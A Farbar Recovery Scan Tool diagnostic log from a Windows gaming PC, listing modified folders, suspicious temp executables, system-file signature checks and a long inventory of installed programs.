2014-10-06 20:13 - 2014-01-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Blizzard Entertainment
2014-10-06 20:13 - 2013-09-22 09:54 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\FalloutNV
2014-10-06 20:13 - 2013-09-09 18:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\CrashRpt
2014-10-06 20:13 - 2013-09-02 21:47 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\BeamNG
2014-10-06 20:13 - 2013-08-22 04:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ESN Sonar
2014-10-06 20:13 - 2013-08-19 21:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\EA Games
2014-10-06 20:13 - 2013-08-13 21:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Dxtory Software
2014-10-06 20:13 - 2013-04-21 09:29 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Fallout3
2014-10-06 19:53 - 2014-01-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Battle.net
2014-10-06 19:49 - 2013-02-21 16:22 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Apple Computer
2014-10-06 19:49 - 2013-02-01 20:09 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ArmA 2 OA
2014-10-06 19:49 - 2013-02-01 08:14 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ArmA 2
2014-10-06 19:49 - 2012-12-26 14:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\AMD
2014-10-06 19:48 - 2014-02-21 00:40 - 00000000 ____D () C:\Users\RaRWolf\Agency
2014-10-06 19:48 - 2013-02-22 22:08 - 00000000 ____D () C:\Users\RaRWolf\Adobe
2014-10-06 19:48 - 2013-02-08 12:56 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\AliensVsPredator
2014-10-06 19:43 - 2014-04-14 17:10 - 00000000 ____D () C:\Users\Public\Documents\S.T.A.L.K.E.R. - Call of Pripyat
2014-10-06 19:43 - 2013-10-12 20:13 - 00000000 ____D () C:\Users\RaRWolf\.minecraft
2014-10-06 19:42 - 2014-08-01 20:16 - 00000000 ____D () C:\ProgramData\RealNetworks
2014-10-06 19:42 - 2014-08-01 20:12 - 00000000 ____D () C:\ProgramData\Real
2014-10-06 19:42 - 2014-04-06 15:15 - 00000000 ____D () C:\ProgramData\Steam
2014-10-06 19:42 - 2013-10-28 16:47 - 00000000 ____D () C:\ProgramData\Razer
2014-10-06 19:42 - 2013-05-12 15:43 - 00000000 __SHD () C:\ProgramData\SecuROM
2014-10-06 19:39 - 2014-07-15 13:57 - 00000000 ____D () C:\ProgramData\Logishrd
2014-10-06 19:39 - 2013-10-26 22:40 - 00000000 ____D () C:\ProgramData\GFACE
2014-10-06 19:39 - 2013-08-14 16:48 - 00000000 ____D () C:\ProgramData\Origin
2014-10-06 19:38 - 2014-01-29 12:28 - 00000000 ____D () C:\ProgramData\Battle.net
2014-10-06 19:38 - 2013-08-16 11:27 - 00000000 __SHD () C:\ProgramData\DSS
2014-10-06 19:38 - 2013-06-11 20:32 - 00000000 ____D () C:\ProgramData\Desura
2014-10-06 19:38 - 2013-02-01 20:09 - 00000000 ____D () C:\ProgramData\Bohemia Interactive Studio
2014-10-03 23:44 - 2014-06-18 20:34 - 00000000 ____D () C:\Windows\C5C1C0F0D62F4DBF81D4D7EF397C228B.TMP
2014-10-03 19:22 - 2013-07-23 12:20 - 04920696 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-01 14:57 - 2013-09-02 21:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Malwarebytes
2014-10-01 14:57 - 2013-09-02 21:45 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-01 14:57 - 2013-09-02 21:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-09-28 16:08 - 2013-08-14 16:50 - 00000000 ____D () C:\Program Files (x86)\Origin Games
2014-09-27 14:20 - 2013-01-12 13:02 - 00348928 _____ () C:\Windows\SysWOW64\PnkBstrB.xtr
2014-09-27 14:20 - 2013-01-12 13:00 - 00348928 _____ () C:\Windows\SysWOW64\PnkBstrB.exe
2014-09-27 14:15 - 2013-01-12 13:00 - 00280904 _____ () C:\Windows\SysWOW64\PnkBstrB.ex0
2014-09-27 14:14 - 2013-08-14 16:48 - 00000000 ____D () C:\Program Files (x86)\Origin
2014-09-27 14:11 - 2013-08-20 12:24 - 00000000 ____D () C:\Program Files (x86)\Battlelog Web Plugins
 
Files to move or delete:
====================
C:\Users\RaRWolf\DispDiag-20140430-212535-4908-1032.dat
C:\Users\RaRWolf\worldpainter_1.7.1.exe
 
 
Some content of TEMP:
====================
C:\Users\RaRWolf\AppData\Local\Temp\0005029e.exe
C:\Users\RaRWolf\AppData\Local\Temp\00140da6.exe
C:\Users\RaRWolf\AppData\Local\Temp\02642ddf.exe
C:\Users\RaRWolf\AppData\Local\Temp\03362cda.exe
C:\Users\RaRWolf\AppData\Local\Temp\036c3d01.exe
C:\Users\RaRWolf\AppData\Local\Temp\bgdfcffc.exe
C:\Users\RaRWolf\AppData\Local\Temp\dllnt_dump.dll
C:\Users\RaRWolf\AppData\Local\Temp\obupdat.exe
C:\Users\RaRWolf\AppData\Local\Temp\tmp6EB8.exe
C:\Users\RaRWolf\AppData\Local\Temp\tmp6EC8.exe
C:\Users\RaRWolf\AppData\Local\Temp\UpdateFlashPlayer_f128d885.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-14 05:48
 
==================== End Of Log ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-10-2014
Ran by RaRWolf at 2014-10-23 18:33:47
Running from C:\Users\RaRWolf\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKCU\...\uTorrent) (Version: 3.4.2.34309 - BitTorrent Inc.)
A Story About My Uncle (HKLM-x32\...\QVN0b3J5QWJvdXRNeVVuY2xl_is1) (Version: 1 - )
Ace of Spades (HKLM-x32\...\{580A2212-7116-46E6-9229-472E23F1DCC8}) (Version: 0.75.013 - Ben Aksoy)
Ace of Spades (HKLM-x32\...\Steam App 224540) (Version:  - )
Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.6.0.5970 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.6.0.5970 - Adobe Systems Incorporated) Hidden
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.5 - Adobe Systems Incorporated)
Adobe Download Assistant (x32 Version: 1.2.5 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Help Manager (x32 Version: 4.0.244 - Adobe Systems Incorporated) Hidden
Adobe Reader X (10.1.3) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.3 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
AI Suite II (HKLM-x32\...\{34D3688E-A737-44C5-9E2A-FF73618728E1}) (Version: 2.00.01 - ASUSTeK Computer Inc.)
AIMP3 (HKLM-x32\...\AIMP3) (Version: v3.55.1355, 14.07.2014 - AIMP DevTeam)
Alien Swarm (HKLM-x32\...\Steam App 630) (Version:  - Valve)
Ancient Weapon Sounds (HKLM-x32\...\{D91802D9-6A42-4563-BC37-B3E2D04DC95B}) (Version: 2.1.0 - Screaming Bee)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2F72F540-1F60-4266-9506-952B21D6640D}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version:  - Bohemia Interactive)
Artemis Artemis (HKLM-x32\...\Artemis) (Version: 2.00.0 - Thom Robertson)
Assassin's Creed II (HKLM-x32\...\{8570BEE8-0CA3-4977-9AB1-80ED93F0513C}) (Version: 1.01 - Ubisoft)
Assassins Creed IV Black Flag (HKLM-x32\...\Uplay Install 273) (Version:  - Ubisoft)
Assassin's Creed Revelations (HKLM-x32\...\{33A22B2D-55BA-4508-B767-BF2E9C21A73F}) (Version: 1.00 - Ubisoft)
ASUS Ai Charger (HKLM-x32\...\{7FB64E72-9B0E-4460-A821-040C341E414A}) (Version: 1.03.00 - ASUSTeK Computer Inc.)
ASUS Easy Update (HKLM-x32\...\{E7AA854E-6756-424E-84C2-4E47D5729AFF}) (Version: 2.00.28 - ASUSTeK Computer Inc)
ASUS WebStorage Sync Agent (HKLM-x32\...\ASUS WebStorage) (Version: 1.1.3.105 - ASUS Cloud Corporation)
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.4126.52 - CyberLink Corp.)
ASUSDVD (x32 Version: 10.0.4126.52 - CyberLink Corp.) Hidden
Audacity 2.0.3 (HKLM-x32\...\Audacity_is1) (Version: 2.0.3 - Audacity Team)
Auto Clicker v1.3 (HKLM-x32\...\{C0A7E4F3-82CC-416B-82C6-BA06AACFD635}_is1) (Version: 1.3 - MurGee.com)
Autodesk SketchBook Pro 6.2.4 (HKLM-x32\...\{B882B2FC-D21E-4BCA-A173-4855757DE84A}) (Version: 6.24.0000 - Autodesk)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 1942™ (HKLM-x32\...\{5BE7BD06-512B-43bf-AD78-3BD2A5F5F7B3}) (Version: 1.6.20.0 - Electronic Arts)
Battlefield 3™ (HKLM-x32\...\{76285C16-411A-488A-BCE3-C83CB933D8CF}) (Version: 1.6.0.0 - Electronic Arts)
Battlefront Extreme 2.2 (HKLM-x32\...\{AFD834CA-4579-49DF-9CF0-EA58822A7C2E}_is1) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.5.1 - EA Digital Illusions CE AB)
BattlEye for OA Uninstall (HKLM-x32\...\BattlEye for OA) (Version:  - )
BeamNG-Techdemo-0.3 (remove only) (HKCU\...\BeamNG-Techdemo-0.3) (Version:  - )
Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation)
Black Ink (HKLM-x32\...\Black Ink 0.151.1634) (Version: 0.151.1634 - Bleank)
Black Ink (x32 Version: 0.151.1634 - Bleank) Hidden
Blue Satin Skin (HKLM-x32\...\{B0C00181-ECF5-4124-A6DE-14EA663D4799}) (Version: 2.2.0 - Screaming Bee)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
Burnout Paradise: The Ultimate Box (HKLM-x32\...\Steam App 24740) (Version:  - Criterion Games)
Carmageddon EFLC 2.0.1.1 (HKLM-x32\...\Carmageddon EFLC 2.0.1.1) (Version:  - )
Carmageddon Mod version 3.0.0.0 (HKLM-x32\...\{8A1CC0C6-88DB-44C6-B259-9EA8EE1BA96C}_is1) (Version: 3.0.0.0 - GiphtWorks)
CCleaner (HKLM\...\CCleaner) (Version: 4.18 - Piriform)
Comic Sound Pack (HKLM-x32\...\{79A743FA-FF99-42DF-8C35-BA40EAEA6668}) (Version: 2.1.0 - Screaming Bee)
Contagion (HKLM-x32\...\Steam App 238430) (Version:  - Monochrome LLC)
Corel Painter 13 - IPM (Version: 13.0 - Corel Corporation) Hidden
Corel Painter 13 - IPM Content (Version: 13.0 - Corel Corporation) Hidden
Counter-Strike: Global Offensive - SDK (HKLM-x32\...\Steam App 745) (Version:  - )
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Creatures of Darkness (HKLM-x32\...\{5B616A3F-43D9-4F0B-9F49-D39342A98592}) (Version: 3.3.0 - Screaming Bee LLC)
Creeper World 3 (HKLM\...\{9FF369E0-0274-4715-A348-1A222857BFCD}_is1) (Version:  - Knuckle Cracker, LLC)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0333 - Disc Soft Ltd)
Dead Space (HKLM-x32\...\Steam App 17470) (Version:  - EA Redwood Shores)
Deep Space Voices (HKLM-x32\...\{336E1A2D-E3EB-4846-B7D0-BD75BBBBC0A4}) (Version: 3.3.0 - Screaming Bee)
DEFCON (HKLM-x32\...\Steam App 1520) (Version:  - Introversion Software)
Dishonored (HKLM-x32\...\Steam App 205100) (Version: 1.0 - Bethesda Softworks)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Dungeonland (HKLM-x32\...\Steam App 218130) (Version:  - Critical Studio)
Dxtory version 2.0.119 (HKLM-x32\...\Dxtory2.0_is1) (Version: 2.0.119 - Dxtory Software)
eManual (HKLM-x32\...\{0C84E634-EB68-4A54-B21E-A05EC87A4CC5}) (Version: 1.00.00 - ASUSTeK Computer Inc.)
Explorer Suite IV (HKLM\...\Explorer Suite_is1) (Version:  - )
f.lux (HKCU\...\Flux) (Version:  - )
Factorio version 0.9.8 (HKLM\...\Factorio_is1) (Version:  - )
Fallout New Vegas  1.4 (HKLM-x32\...\Fallout New Vegas_is1) (Version: 1.4 - Bethesda Softworks)
Fantasy Sound Pack (HKLM-x32\...\{06ACD0D6-537A-4831-9608-AA74A5795698}) (Version: 1.1.0 - Screaming Bee)
Far Cry 3 Blood Dragon (HKLM-x32\...\Far Cry 3 Blood Dragon_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Far Cry® 3 (HKLM-x32\...\Steam App 220240) (Version:  - Ubisoft Montreal, Massive Entertainment, and Ubisoft Shanghai)
Farm Animal Sounds (HKLM-x32\...\{20052CA0-FF43-4901-8261-E6DBF0A09ED1}) (Version: 1.1.0 - Screaming Bee)
FileASSASSIN (HKLM-x32\...\FileASSASSIN) (Version: 1.06 - Malwarebytes)
Fistful of Frags (HKLM-x32\...\Steam App 265630) (Version:  - Fistful of Frags Team)
Floating Point (HKLM-x32\...\Steam App 302380) (Version:  - Suspicious Developments)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Free Screen Video Recorder version 2.5.30.725 (HKLM-x32\...\Free Screen Video Recorder_is1) (Version: 2.5.30.725 - DVDVideoSoft Ltd.)
Frozen Synapse (HKLM-x32\...\Steam App 98200) (Version:  - )
FTL version 1.01 (HKLM-x32\...\{20E23A40-38E5-4DD6-B738-BC8097AE66B6}_is1) (Version: 1.01 - Subset Games)
Galactic Voices (HKLM-x32\...\{DF3FE308-58F2-45E2-9BB0-6A993794AD5C}) (Version: 1.3.0 - Screaming Bee)
Galería de fotos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Galerie de photos (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
GameMaker: Studio (HKLM-x32\...\Steam App 214850) (Version:  - YoYo Games Ltd.)
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Garry)
Ghost Recon Online (NCSA-Live) (HKCU\...\fc418bf9b18f76aa) (Version: 1.30.8665.2 - Ubisoft)
GoldenEye: Source (HKLM-x32\...\GoldenEye Source) (Version: 4.2.3 - Team GoldenEye: Source)
GoldenEye: Source (HKLM-x32\...\GoldenEye: Source) (Version: 4.2 - Team GoldenEye: Source)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.104 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Grand Theft Auto IV (HKLM-x32\...\Steam App 12210) (Version:  - Rockstar North)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
Grand Theft Auto: Episodes from Liberty City (HKLM-x32\...\Steam App 12220) (Version:  - Rockstar North / Toronto)
Grand Theft Auto: Episodes from Liberty City (x32 Version: 1.0.0002.135 - Rockstar Games Inc.) Hidden
GTA San Andreas (HKLM-x32\...\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}) (Version: 1.00.00001 - Rockstar Games)
Gunpoint (HKLM-x32\...\Steam App 206190) (Version:  - Suspicious Developments)
Guns of Icarus Online (HKLM-x32\...\Steam App 209080) (Version:  - Muse Games)
HexEdit (HKLM-x32\...\{083EF76E-0760-4D7A-9508-0B88A3AF1889}) (Version: 4.0.0 - Expert Commercial Software Pty Ltd)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Hitman Absolution (HKLM-x32\...\Hitman Absolution_is1) (Version:  - )
Hitman Blood Money (HKLM-x32\...\{A804B134-F03D-4EFD-9BC0-DCD257AA1B22}) (Version: 1.00.0000 - Eidos)
IconHandler 64 bit (Version: 2.0 - Corel Corporation) Hidden
Inform 7 (HKLM-x32\...\Inform 7) (Version:  - )
iTunes (HKLM\...\{0225AD21-F3E2-4916-BFF3-65D3F9052582}) (Version: 11.0.2.26 - Apple Inc.)
Jack Claw (HKLM-x32\...\Jack Claw_is1) (Version:  - Frozenbyte, Inc.)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.670 - Oracle)
Java Auto Updater (x32 Version: 2.1.67.1 - Oracle, Inc.) Hidden
Just Cause 2 (HKLM-x32\...\Steam App 8190) (Version:  - Avalanche)
Just Cause 2: Multiplayer Mod (HKLM-x32\...\Steam App 259080) (Version:  - JC2-MP Team)
Kits Configuration Installer (x32 Version: 8.100.25984 - Microsoft) Hidden
L.A. Noire (HKLM-x32\...\Steam App 110800) (Version:  - Team Bondi)
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version:  - Valve)
Left 4 Dead 2 Authoring Tools (HKLM-x32\...\Steam App 563) (Version:  - Valve)
Left 4 Dead 2 Beta (HKLM-x32\...\Steam App 223530) (Version:  - )
Logitech SetPoint 6.65 (HKLM\...\sp6) (Version: 6.65.62 - Logitech)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.236 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.236 - LogMeIn, Inc.) Hidden
Magicite (HKLM-x32\...\Steam App 268750) (Version:  - SmashGames)
Magicka (HKLM-x32\...\Steam App 42910) (Version:  - Arrowhead Game Studios AB)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Mass Effect - Unification version 1.12 (HKLM-x32\...\{2CD83494-75D3-457B-A9EA-164377B56443}_is1) (Version: 1.12 - Frayed Wires Studios)
Mass Effect (HKLM-x32\...\{1B0FBB9A-995D-47cd-87CD-13E68B676E4F}) (Version: 1.00 - Electronic Arts, Inc.)
Mass Effect 2 (HKLM-x32\...\{75D84EF7-0D8C-4e70-B3FA-7B42A5D4E0EB}) (Version: 1.02 - Electronic Arts, Inc.)
Mass Effect™ 3 (HKLM-x32\...\{6A9D1594-7791-48f5-9CAA-DE9BCB968320}) (Version: 1.01.0.0 - Electronic Arts)
Men of War: Assault Squad (HKLM-x32\...\Steam App 64000) (Version:  - Digitalmindsoft)
Men of War: Red Tide (HKLM-x32\...\Steam App 3130) (Version:  - 1C Company)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft Chart Controls for Microsoft .NET Framework 3.5 (HKLM-x32\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.0.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Motocross Madness 2 (HKLM-x32\...\Motocross Madness 2) (Version:  - )
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Middle-earth: Shadow of Mordor (HKLM-x32\...\Steam App 241930) (Version:  - Monolith Productions, Inc.)
Modern Combat (HKLM-x32\...\Modern Combat 1.015) (Version: 1.015 - BSS Modern Combat Dev Team)
Modern Combat (x32 Version: 1.015 - BSS Modern Combat Dev Team) Hidden
MorphVOX Pro (HKLM-x32\...\{DE289787-7ECA-4BED-9D8C-99FAC407E3D6}) (Version: 4.3.13 - Screaming Bee)
Morrowind (HKLM-x32\...\{C325F588-D6B1-4A7F-B6A2-914C75DDA348}) (Version:  - )
Movie Maker (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Mozilla Firefox 29.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 29.0.1 (x86 en-US)) (Version: 29.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSI Afterburner 2.3.1 (HKLM-x32\...\Afterburner) (Version: 2.3.1 - MSI Co., LTD)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1108.0727 - Microsoft) Hidden
Multiwinia (HKLM-x32\...\Steam App 1530) (Version:  - Introversion Software)
Natural Selection 2 (HKLM-x32\...\Steam App 4920) (Version:  - Unknown Worlds Entertainment)
Nero 12 Essentials OEM.a01 (HKLM-x32\...\{2AC099EA-CC1C-4E4E-BDFC-0353DCF13DD0}) (Version: 12.5.00400 - Nero AG)
Nero ControlCenter (x32 Version: 11.0.15200 - Nero AG) Hidden
Nero ControlCenter Help (CHM) (x32 Version: 12.0.0003 - Nero AG) Hidden
Nero Core Components (x32 Version: 11.0.17800 - Nero AG) Hidden
Nero Express (x32 Version: 12.0.19000 - Nero AG) Hidden
Nero Express Help (CHM) (x32 Version: 12.0.1000 - Nero AG) Hidden
Nero Launcher (x32 Version: 12.2.2000 - Nero AG) Hidden
Nero Update (x32 Version: 11.0.11800.31.0 - Nero AG) Hidden
Next Car Game Technology Sneak Peek 2.0 (HKLM-x32\...\Next Car Game Technology Sneak Peek) (Version:  - Bugbear Entertainment)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.52.1 - Black Tree Gaming)
Nidhogg (HKLM-x32\...\Steam App 94400) (Version:  - Messhof)
No More Room in Hell (HKLM-x32\...\Steam App 224260) (Version:  - No More Room in Hell Team)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6 - Notepad++ Team)
NVIDIA 3D Vision Controller Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 337.88 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 337.88 - NVIDIA Corporation)
NVIDIA Control Panel 337.88 (Version: 337.88 - NVIDIA Corporation) Hidden
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 337.88 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.157.1165 - NVIDIA Corporation) Hidden
